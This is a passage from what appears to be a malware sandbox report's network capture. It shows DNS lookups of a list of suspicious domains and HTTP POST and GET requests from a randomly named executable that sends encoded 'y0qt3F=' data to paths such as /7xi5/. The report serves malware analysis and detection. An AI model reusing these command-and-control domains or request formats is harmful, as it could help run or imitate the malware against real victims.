                                                    Sep 26, 2024 09:26:41.107707977 CEST804978085.159.66.93192.168.2.4
                                                    Sep 26, 2024 09:26:41.107789993 CEST804978085.159.66.93192.168.2.4
                                                    Sep 26, 2024 09:26:41.107800007 CEST804978085.159.66.93192.168.2.4
                                                    Sep 26, 2024 09:26:41.107824087 CEST804978085.159.66.93192.168.2.4
                                                    Sep 26, 2024 09:26:41.108366013 CEST804978085.159.66.93192.168.2.4
                                                    Sep 26, 2024 09:26:41.108376980 CEST804978085.159.66.93192.168.2.4
                                                    Sep 26, 2024 09:26:41.108411074 CEST804978085.159.66.93192.168.2.4
                                                    Sep 26, 2024 09:26:41.108419895 CEST804978085.159.66.93192.168.2.4
                                                    Sep 26, 2024 09:26:42.606057882 CEST4978080192.168.2.485.159.66.93
                                                    Sep 26, 2024 09:26:42.613658905 CEST804978085.159.66.93192.168.2.4
                                                    Sep 26, 2024 09:26:42.613714933 CEST4978080192.168.2.485.159.66.93
                                                    Sep 26, 2024 09:26:43.625257969 CEST4978180192.168.2.485.159.66.93
                                                    Sep 26, 2024 09:26:43.630455017 CEST804978185.159.66.93192.168.2.4
                                                    Sep 26, 2024 09:26:43.633389950 CEST4978180192.168.2.485.159.66.93
                                                    Sep 26, 2024 09:26:43.640921116 CEST4978180192.168.2.485.159.66.93
                                                    Sep 26, 2024 09:26:43.645790100 CEST804978185.159.66.93192.168.2.4

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Sep 26, 2024 09:23:44.306485891 CEST6027453192.168.2.41.1.1.1
                                                    Sep 26, 2024 09:23:44.315968037 CEST53602741.1.1.1192.168.2.4
                                                    Sep 26, 2024 09:23:49.328613043 CEST5887553192.168.2.41.1.1.1
                                                    Sep 26, 2024 09:23:49.338507891 CEST53588751.1.1.1192.168.2.4
                                                    Sep 26, 2024 09:23:54.343935013 CEST5227253192.168.2.41.1.1.1
                                                    Sep 26, 2024 09:23:54.818943977 CEST53522721.1.1.1192.168.2.4
                                                    Sep 26, 2024 09:24:10.484860897 CEST5633553192.168.2.41.1.1.1
                                                    Sep 26, 2024 09:24:10.503878117 CEST53563351.1.1.1192.168.2.4
                                                    Sep 26, 2024 09:24:26.578356028 CEST6494653192.168.2.41.1.1.1
                                                    Sep 26, 2024 09:24:27.300833941 CEST53649461.1.1.1192.168.2.4
                                                    Sep 26, 2024 09:24:40.438309908 CEST5969053192.168.2.41.1.1.1
                                                    Sep 26, 2024 09:24:40.811199903 CEST53596901.1.1.1192.168.2.4
                                                    Sep 26, 2024 09:24:59.408082962 CEST6100353192.168.2.41.1.1.1
                                                    Sep 26, 2024 09:24:59.460661888 CEST53610031.1.1.1192.168.2.4
                                                    Sep 26, 2024 09:25:12.783231020 CEST6027053192.168.2.41.1.1.1
                                                    Sep 26, 2024 09:25:13.309989929 CEST53602701.1.1.1192.168.2.4
                                                    Sep 26, 2024 09:25:26.647103071 CEST6112153192.168.2.41.1.1.1
                                                    Sep 26, 2024 09:25:26.663638115 CEST53611211.1.1.1192.168.2.4
                                                    Sep 26, 2024 09:25:39.985582113 CEST5589053192.168.2.41.1.1.1
                                                    Sep 26, 2024 09:25:40.002870083 CEST53558901.1.1.1192.168.2.4
                                                    Sep 26, 2024 09:25:53.140913010 CEST6128453192.168.2.41.1.1.1
                                                    Sep 26, 2024 09:26:06.721239090 CEST5226753192.168.2.41.1.1.1
                                                    Sep 26, 2024 09:26:07.281342030 CEST53522671.1.1.1192.168.2.4
                                                    Sep 26, 2024 09:26:21.688637972 CEST6414353192.168.2.41.1.1.1
                                                    Sep 26, 2024 09:26:22.605562925 CEST53641431.1.1.1192.168.2.4
                                                    Sep 26, 2024 09:26:35.875566959 CEST6412053192.168.2.41.1.1.1
                                                    Sep 26, 2024 09:26:35.976186037 CEST53641201.1.1.1192.168.2.4

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Sep 26, 2024 09:23:44.306485891 CEST192.168.2.41.1.1.10xdde2Standard query (0)www.woshop.onlineA (IP address)IN (0x0001)false
                                                    Sep 26, 2024 09:23:49.328613043 CEST192.168.2.41.1.1.10x4b4bStandard query (0)www.kxshopmr.storeA (IP address)IN (0x0001)false
                                                    Sep 26, 2024 09:23:54.343935013 CEST192.168.2.41.1.1.10xd0f9Standard query (0)www.elsupertodo.netA (IP address)IN (0x0001)false
                                                    Sep 26, 2024 09:24:10.484860897 CEST192.168.2.41.1.1.10x2787Standard query (0)www.omexai.infoA (IP address)IN (0x0001)false
                                                    Sep 26, 2024 09:24:26.578356028 CEST192.168.2.41.1.1.10xc8b6Standard query (0)www.tekilla.wtfA (IP address)IN (0x0001)false
                                                    Sep 26, 2024 09:24:40.438309908 CEST192.168.2.41.1.1.10x38a1Standard query (0)www.bola88site.oneA (IP address)IN (0x0001)false
                                                    Sep 26, 2024 09:24:59.408082962 CEST192.168.2.41.1.1.10x4569Standard query (0)www.languagemodel.proA (IP address)IN (0x0001)false
                                                    Sep 26, 2024 09:25:12.783231020 CEST192.168.2.41.1.1.10x132dStandard query (0)www.kexweb.topA (IP address)IN (0x0001)false
                                                    Sep 26, 2024 09:25:26.647103071 CEST192.168.2.41.1.1.10x6598Standard query (0)www.jobworklanka.onlineA (IP address)IN (0x0001)false
                                                    Sep 26, 2024 09:25:39.985582113 CEST192.168.2.41.1.1.10x7982Standard query (0)www.dyme.techA (IP address)IN (0x0001)false
                                                    Sep 26, 2024 09:25:53.140913010 CEST192.168.2.41.1.1.10xa67dStandard query (0)www.arlon-commerce.comA (IP address)IN (0x0001)false
                                                    Sep 26, 2024 09:26:06.721239090 CEST192.168.2.41.1.1.10xc8aaStandard query (0)www.mizuquan.topA (IP address)IN (0x0001)false
                                                    Sep 26, 2024 09:26:21.688637972 CEST192.168.2.41.1.1.10xa93eStandard query (0)www.nobartv6.websiteA (IP address)IN (0x0001)false
                                                    Sep 26, 2024 09:26:35.875566959 CEST192.168.2.41.1.1.10x6448Standard query (0)www.sailnway.netA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Sep 26, 2024 09:23:44.315968037 CEST1.1.1.1192.168.2.40xdde2Name error (3)www.woshop.onlinenonenoneA (IP address)IN (0x0001)false
                                                    Sep 26, 2024 09:23:49.338507891 CEST1.1.1.1192.168.2.40x4b4bName error (3)www.kxshopmr.storenonenoneA (IP address)IN (0x0001)false
                                                    Sep 26, 2024 09:23:54.818943977 CEST1.1.1.1192.168.2.40xd0f9No error (0)www.elsupertodo.net148.72.152.174A (IP address)IN (0x0001)false
                                                    Sep 26, 2024 09:24:10.503878117 CEST1.1.1.1192.168.2.40x2787No error (0)www.omexai.infoomexai.infoCNAME (Canonical name)IN (0x0001)false
                                                    Sep 26, 2024 09:24:10.503878117 CEST1.1.1.1192.168.2.40x2787No error (0)omexai.info3.33.130.190A (IP address)IN (0x0001)false
                                                    Sep 26, 2024 09:24:10.503878117 CEST1.1.1.1192.168.2.40x2787No error (0)omexai.info15.197.148.33A (IP address)IN (0x0001)false
                                                    Sep 26, 2024 09:24:27.300833941 CEST1.1.1.1192.168.2.40xc8b6No error (0)www.tekilla.wtfredirect.3dns.boxCNAME (Canonical name)IN (0x0001)false
                                                    Sep 26, 2024 09:24:27.300833941 CEST1.1.1.1192.168.2.40xc8b6No error (0)redirect.3dns.box172.191.244.62A (IP address)IN (0x0001)false
                                                    Sep 26, 2024 09:24:40.811199903 CEST1.1.1.1192.168.2.40x38a1No error (0)www.bola88site.onebola88site.oneCNAME (Canonical name)IN (0x0001)false
                                                    Sep 26, 2024 09:24:40.811199903 CEST1.1.1.1192.168.2.40x38a1No error (0)bola88site.one172.96.191.39A (IP address)IN (0x0001)false
                                                    Sep 26, 2024 09:24:59.460661888 CEST1.1.1.1192.168.2.40x4569No error (0)www.languagemodel.prowebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)false
                                                    Sep 26, 2024 09:24:59.460661888 CEST1.1.1.1192.168.2.40x4569No error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)false
                                                    Sep 26, 2024 09:25:13.309989929 CEST1.1.1.1192.168.2.40x132dNo error (0)www.kexweb.top63.250.47.40A (IP address)IN (0x0001)false
                                                    Sep 26, 2024 09:25:26.663638115 CEST1.1.1.1192.168.2.40x6598No error (0)www.jobworklanka.onlinejobworklanka.onlineCNAME (Canonical name)IN (0x0001)false
                                                    Sep 26, 2024 09:25:26.663638115 CEST1.1.1.1192.168.2.40x6598No error (0)jobworklanka.online91.184.0.200A (IP address)IN (0x0001)false
                                                    Sep 26, 2024 09:25:40.002870083 CEST1.1.1.1192.168.2.40x7982No error (0)www.dyme.tech13.248.169.48A (IP address)IN (0x0001)false
                                                    Sep 26, 2024 09:25:40.002870083 CEST1.1.1.1192.168.2.40x7982No error (0)www.dyme.tech76.223.54.146A (IP address)IN (0x0001)false
                                                    Sep 26, 2024 09:25:53.205543995 CEST1.1.1.1192.168.2.40xa67dNo error (0)www.arlon-commerce.comwhois-unverified.domainbox.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                    Sep 26, 2024 09:26:07.281342030 CEST1.1.1.1192.168.2.40xc8aaNo error (0)www.mizuquan.top43.242.202.169A (IP address)IN (0x0001)false
                                                    Sep 26, 2024 09:26:22.605562925 CEST1.1.1.1192.168.2.40xa93eNo error (0)www.nobartv6.website103.224.182.242A (IP address)IN (0x0001)false
                                                    Sep 26, 2024 09:26:35.976186037 CEST1.1.1.1192.168.2.40x6448No error (0)www.sailnway.netredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                    Sep 26, 2024 09:26:35.976186037 CEST1.1.1.1192.168.2.40x6448No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                    Sep 26, 2024 09:26:35.976186037 CEST1.1.1.1192.168.2.40x6448No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • www.elsupertodo.net
                                                    • www.omexai.info
                                                    • www.tekilla.wtf
                                                    • www.bola88site.one
                                                    • www.languagemodel.pro
                                                    • www.kexweb.top
                                                    • www.jobworklanka.online
                                                    • www.dyme.tech
                                                    • www.mizuquan.top
                                                    • www.nobartv6.website
                                                    • www.sailnway.net

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.449736148.72.152.174801880C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 26, 2024 09:23:54.838567019 CEST545OUTGET /2jit/?y0qt3F=iS4P4oRSl8BXKzGHIPEeBFILTgF0I4K6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1TqEhan6EIKUcOtzcvEOIT7DGSSciknjeHA8=&kZ=E8WpI HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.elsupertodo.net
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Sep 26, 2024 09:23:55.433655977 CEST528INHTTP/1.1 301 Moved Permanently
                                                    Server: nginx
                                                    Date: Thu, 26 Sep 2024 07:23:55 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 162
                                                    Connection: close
                                                    Location: https://www.elsupertodo.net/2jit/?y0qt3F=iS4P4oRSl8BXKzGHIPEeBFILTgF0I4K6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1TqEhan6EIKUcOtzcvEOIT7DGSSciknjeHA8=&kZ=E8WpI
                                                    X-XSS-Protection: 1; mode=block
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.4497383.33.130.190801880C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 26, 2024 09:24:10.522964954 CEST807OUTPOST /7xi5/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.omexai.info
                                                    Origin: http://www.omexai.info
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 203
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.omexai.info/7xi5/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 76 7a 67 59 35 44 63 68 62 55 54 75 44 6a 34 66 55 36 59 48 75 70 73 47 53 50 58 6d 52 46 49 67 6c 35 4a 41 74 2b 4d 75 37 6a 4c 74 48 52 35 37 37 73 30 70 67 61 79 37 52 48 78 61 61 51 4a 56 73 42 44 31 78 47 70 2b 6d 36 66 2f 53 36 35 79 43 72 38 56 5a 44 76 44 44 6a 48 7a 6a 31 32 43 74 62 6f 53 38 53 77 4e 65 63 42 37 34 37 61 6b 62 4c 6f 74 59 51 52 6f 4b 57 73 4f 69 72 6f 61 47 55 5a 53 6c 65 50 4f 47 57 6a 79 37 79 73 35 65 4e 69 47 54 71 6e 6e 34 39 35 72 6b 77 52 65 35 68 62 58 62 50 76 38 4f 73 4c 6a 43 41 63 70 71 6d 51 4f 6f 31 57 70 61 75 35 41 4e 48 76 56 73 67 3d 3d
                                                    Data Ascii: y0qt3F=vzgY5DchbUTuDj4fU6YHupsGSPXmRFIgl5JAt+Mu7jLtHR577s0pgay7RHxaaQJVsBD1xGp+m6f/S65yCr8VZDvDDjHzj12CtboS8SwNecB747akbLotYQRoKWsOiroaGUZSlePOGWjy7ys5eNiGTqnn495rkwRe5hbXbPv8OsLjCAcpqmQOo1Wpau5ANHvVsg==


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.4497393.33.130.190801880C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 26, 2024 09:24:13.071923018 CEST827OUTPOST /7xi5/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.omexai.info
                                                    Origin: http://www.omexai.info
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 223
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.omexai.info/7xi5/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 76 7a 67 59 35 44 63 68 62 55 54 75 43 44 49 66 59 35 77 48 2f 35 73 4a 58 50 58 6d 66 56 49 73 6c 35 4e 41 74 2f 59 45 37 51 6a 74 48 77 4a 37 36 75 63 70 6c 61 79 37 4a 33 78 47 55 77 4a 43 73 42 66 4c 78 43 74 2b 6d 2b 2f 2f 53 36 4a 79 43 59 55 61 44 7a 76 4e 58 54 48 78 2b 46 32 43 74 62 6f 53 38 53 30 33 65 63 70 37 34 72 71 6b 61 70 4d 69 56 77 52 76 63 6d 73 4f 6d 72 6f 57 47 55 5a 4b 6c 65 2b 47 47 55 72 79 37 79 63 35 65 5a 2b 48 49 61 6e 62 31 64 34 66 71 78 31 57 2b 51 66 65 55 50 72 38 52 76 37 42 4b 6d 4e 7a 37 58 78 5a 36 31 79 61 48 70 77 30 41 45 53 63 33 69 54 2b 67 66 35 51 71 53 47 55 69 43 73 2b 4a 31 4d 77 62 6f 55 3d
                                                    Data Ascii: y0qt3F=vzgY5DchbUTuCDIfY5wH/5sJXPXmfVIsl5NAt/YE7QjtHwJ76ucplay7J3xGUwJCsBfLxCt+m+//S6JyCYUaDzvNXTHx+F2CtboS8S03ecp74rqkapMiVwRvcmsOmroWGUZKle+GGUry7yc5eZ+HIanb1d4fqx1W+QfeUPr8Rv7BKmNz7XxZ61yaHpw0AESc3iT+gf5QqSGUiCs+J1MwboU=


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.4497403.33.130.190801880C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 26, 2024 09:24:15.610882044 CEST10909OUTPOST /7xi5/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.omexai.info
                                                    Origin: http://www.omexai.info
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 10303
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.omexai.info/7xi5/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 76 7a 67 59 35 44 63 68 62 55 54 75 43 44 49 66 59 35 77 48 2f 35 73 4a 58 50 58 6d 66 56 49 73 6c 35 4e 41 74 2f 59 45 37 57 37 74 48 69 42 37 34 50 63 70 6d 61 79 37 41 58 78 46 55 77 4a 66 73 42 48 50 78 43 68 49 6d 34 7a 2f 54 5a 42 79 4b 4a 55 61 4e 44 76 4e 49 44 48 30 6a 31 32 79 74 62 35 56 38 54 45 33 65 63 70 37 34 70 43 6b 64 37 6f 69 47 67 52 6f 4b 57 73 43 69 72 70 44 47 55 42 30 6c 61 69 57 48 6c 4c 79 34 53 4d 35 66 73 69 48 45 61 6e 6a 79 64 34 48 71 78 49 49 2b 55 2b 6e 55 4d 32 62 52 6f 4c 42 4f 43 55 30 6e 57 46 79 6c 44 75 51 53 62 6b 33 4c 30 71 63 35 77 7a 78 7a 4e 35 32 2f 52 75 72 6d 31 42 42 61 45 4e 7a 59 34 6d 75 48 76 70 76 69 6b 48 48 6c 53 7a 31 7a 43 74 57 43 38 71 69 6b 4d 72 33 64 71 62 31 73 74 45 2f 4f 4d 62 4f 4b 4c 7a 75 72 46 37 62 61 78 58 63 75 6a 36 39 43 6b 76 65 7a 76 34 2b 48 66 53 7a 31 65 68 67 4a 78 36 72 6f 50 4a 6b 67 30 6a 76 45 78 4b 37 4b 58 7a 79 34 53 59 45 6b 57 51 73 52 58 79 6a 62 6f 67 69 2b 65 7a 2b 70 75 63 50 79 43 61 [TRUNCATED]
                                                    Data Ascii: y0qt3F=vzgY5DchbUTuCDIfY5wH/5sJXPXmfVIsl5NAt/YE7W7tHiB74Pcpmay7AXxFUwJfsBHPxChIm4z/TZByKJUaNDvNIDH0j12ytb5V8TE3ecp74pCkd7oiGgRoKWsCirpDGUB0laiWHlLy4SM5fsiHEanjyd4HqxII+U+nUM2bRoLBOCU0nWFylDuQSbk3L0qc5wzxzN52/Rurm1BBaENzY4muHvpvikHHlSz1zCtWC8qikMr3dqb1stE/OMbOKLzurF7baxXcuj69Ckvezv4+HfSz1ehgJx6roPJkg0jvExK7KXzy4SYEkWQsRXyjbogi+ez+pucPyCa9AoYlGLu+jqcDvYWLfYd1qkMYV6LVQ9Dk4aY7/ItPKefbKZFtJy7Iab/I4C62tzudCGJYKTbcYpS1Qa92uzzxmtA3tpkeBWhlujEJx17XyhLgkBzRjNt723uss0BOc3fgeDC50sw2kb3bZij8VA4let57uGhDUTlXykKt5Sz/vP9rOJxq5c2fe2ECl0ay7bebXd0dFxS9hgU5cHKSBfhMglLlObVRwKMKe0dT5jKaLh1pq3oiAu3UAiC7wQVK/TH3qB7EJ5i0kjnjBh5v7ygB+JacoYfibrLerAPMWUoUDWD5fQDF0CjF04dozODAOZ72ZQEkVTRz4A2fp8zufnhV5ngxHYGNnv+91izWf01awE3pJGIvFGgykpT1kU9Xubmzy8cOAK5mdINtrOLF0IT+x87Me70nhuSGKleYM6Mqumao8lvlmO8P9rJydt5d6wlvrE0tr4yA0mCof8uVT6wDlJNnpvqOXXqi85vn1ZTSkNmmH8FjcSuQEbl6/+oPKVNVtiYNJsta2f6zjqLWuXxkjmT4SRK/xgcL5xoIr7gqO25UxQr7P/NTnr/qXDlizBL9m6phnJa3XcMIrsRPdDAEdsAUm4frUKn7/sPJUqaq861FLMcHqxEMjjGym01CfcCGyhjrAJVJouOwl9j6rYXCcVfZREk4mkylE [TRUNCATED]


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.4497413.33.130.190801880C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 26, 2024 09:24:18.153629065 CEST541OUTGET /7xi5/?y0qt3F=ixI46zwDNWOoK0d6d59SvpgDB+zqSFA+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELBx/+PEXrpF63uptF2gwKAcNaoJelZ45iHH4=&kZ=E8WpI HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.omexai.info
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Sep 26, 2024 09:24:21.563687086 CEST391INHTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Thu, 26 Sep 2024 07:24:21 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 251
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 79 30 71 74 33 46 3d 69 78 49 34 36 7a 77 44 4e 57 4f 6f 4b 30 64 36 64 35 39 53 76 70 67 44 42 2b 7a 71 53 46 41 2b 71 73 46 4c 2b 76 34 68 7a 78 71 46 47 54 34 70 33 2b 38 57 74 6f 50 4b 47 55 73 2f 61 54 31 66 6b 44 6e 63 78 51 52 66 6c 70 71 4a 56 75 4e 51 46 62 45 4c 42 78 2f 2b 50 45 58 72 70 46 36 33 75 70 74 46 32 67 77 4b 41 63 4e 61 6f 4a 65 6c 5a 34 35 69 48 48 34 3d 26 6b 5a 3d 45 38 57 70 49 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?y0qt3F=ixI46zwDNWOoK0d6d59SvpgDB+zqSFA+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELBx/+PEXrpF63uptF2gwKAcNaoJelZ45iHH4=&kZ=E8WpI"}</script></head></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.449742172.191.244.62801880C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 26, 2024 09:24:27.320738077 CEST807OUTPOST /fpzw/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.tekilla.wtf
                                                    Origin: http://www.tekilla.wtf
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 203
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.tekilla.wtf/fpzw/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 69 6d 52 77 54 63 61 61 4c 30 33 6a 6d 5a 59 70 59 62 77 72 56 71 75 6a 52 30 5a 66 55 35 75 31 65 7a 36 63 32 6e 5a 55 78 52 71 58 4e 76 64 6a 36 69 61 68 4c 38 57 43 31 41 56 38 56 36 31 4f 58 47 67 54 34 35 35 6e 38 56 56 43 54 6f 43 59 32 36 33 44 33 5a 44 59 46 61 77 44 31 4b 70 49 64 36 79 42 73 35 59 7a 4a 64 66 56 31 66 73 41 55 30 37 68 72 75 6f 75 49 5a 68 31 45 33 65 6d 56 61 43 49 6f 66 53 72 64 58 67 50 65 4b 64 52 66 76 79 6c 4e 41 2b 47 54 56 6f 7a 55 54 6a 41 61 43 64 2b 66 31 69 2b 75 2b 79 6f 68 58 41 73 6f 43 57 70 4e 57 4e 4e 6c 34 78 69 6e 77 6b 34 4d 51 3d 3d
                                                    Data Ascii: y0qt3F=imRwTcaaL03jmZYpYbwrVqujR0ZfU5u1ez6c2nZUxRqXNvdj6iahL8WC1AV8V61OXGgT455n8VVCToCY263D3ZDYFawD1KpId6yBs5YzJdfV1fsAU07hruouIZh1E3emVaCIofSrdXgPeKdRfvylNA+GTVozUTjAaCd+f1i+u+yohXAsoCWpNWNNl4xinwk4MQ==
                                                    Sep 26, 2024 09:24:27.786573887 CEST195INHTTP/1.1 404 Not Found
                                                    Content-Type: text/plain; charset=utf-8
                                                    X-Content-Type-Options: nosniff
                                                    Date: Thu, 26 Sep 2024 07:24:27 GMT
                                                    Content-Length: 19
                                                    Connection: close
                                                    Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                    Data Ascii: 404 page not found


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.449743172.191.244.62801880C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 26, 2024 09:24:29.860094070 CEST827OUTPOST /fpzw/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.tekilla.wtf
                                                    Origin: http://www.tekilla.wtf
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 223
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.tekilla.wtf/fpzw/
